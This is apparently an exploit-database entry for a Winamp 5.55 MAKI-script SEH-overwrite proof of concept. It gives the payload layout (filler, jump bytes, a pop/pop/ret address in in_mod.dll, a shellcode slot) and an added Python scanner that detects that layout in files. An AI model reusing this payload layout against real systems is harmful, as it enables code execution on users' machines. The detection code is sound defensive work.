Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC

2009-05-22T00:00:00
ID 1337DAY-ID-6871
Type zdt
Reporter His0k4
Modified 2009-05-22T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
========================================================
Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC
========================================================


[x] Bug: Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit
[x] Exploited By His0k4

[x] Description: The vulnerability is triggered when parsing a MAKI script file, specifically in "getRuntimeVersion",
                 and we can overwrite the SEH easily :)
				 
The exploit schema looks like this:
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode # calc shellcode from metasploit
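
For detection, an added example (not part of the original PoC): a file scanner for the layout in the schema above, i.e. a long single-byte filler run directly followed by a short-jump/NOP "next SEH" field and a 4-byte handler pointer. The 1024-byte filler threshold, the function names and the sample buffer are assumptions constructed for illustration; the sample carries inert 0xCC bytes where the schema has shellcode.

```python
import struct

MIN_FILLER = 1024  # assumption: shortest single-byte run treated as overflow filler

def is_short_jump(opcode: int) -> bool:
    """True for JMP rel8 (0xEB) and Jcc rel8 (0x70-0x7F)."""
    return opcode == 0xEB or 0x70 <= opcode <= 0x7F

def find_seh_overwrite_records(data: bytes, min_filler: int = MIN_FILLER) -> list:
    """Report each filler run that is directly followed by an 8-byte
    nSEH/handler pair shaped like the schema: jump, rel8, NOP, NOP, pointer."""
    hits = []
    i, n = 0, len(data)
    while i < n:
        j = i
        while j < n and data[j] == data[i]:   # measure the run starting at i
            j += 1
        rec = data[j:j + 8]
        if (j - i >= min_filler and len(rec) == 8
                and is_short_jump(rec[0]) and rec[2:4] == b"\x90\x90"):
            disp = rec[1] - 256 if rec[1] >= 0x80 else rec[1]  # rel8 is signed
            hits.append({
                "offset": j,                      # file offset of the nSEH field
                "filler_len": j - i,
                "jump_target": 2 + disp,          # relative to the nSEH field
                "handler": struct.unpack("<I", rec[4:8])[0],
            })
        i = j
    return hits

# Constructed sample: arbitrary header, the schema's filler and two dwords,
# then inert 0xCC bytes standing in for the payload.
HEADER = b"CONSTRUCTED\x00"
SAMPLE = (HEADER + b"\x41" * 16756 + b"\x74\x06\x90\x90"
          + b"\x32\x55\xF0\x12" + b"\xCC" * 16)

if __name__ == "__main__":
    for hit in find_seh_overwrite_records(SAMPLE):
        # jump_target >= 8 means execution would land past the handler pointer
        print("offset=%d filler=%d jump_target=%+d handler=0x%08X"
              % (hit["offset"], hit["filler_len"], hit["jump_target"], hit["handler"]))
```

A filler byte that happens to equal the jump opcode would be absorbed into the run and missed, so treat this as a triage heuristic rather than a complete signature.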




#  0day.today [2018-01-08]  #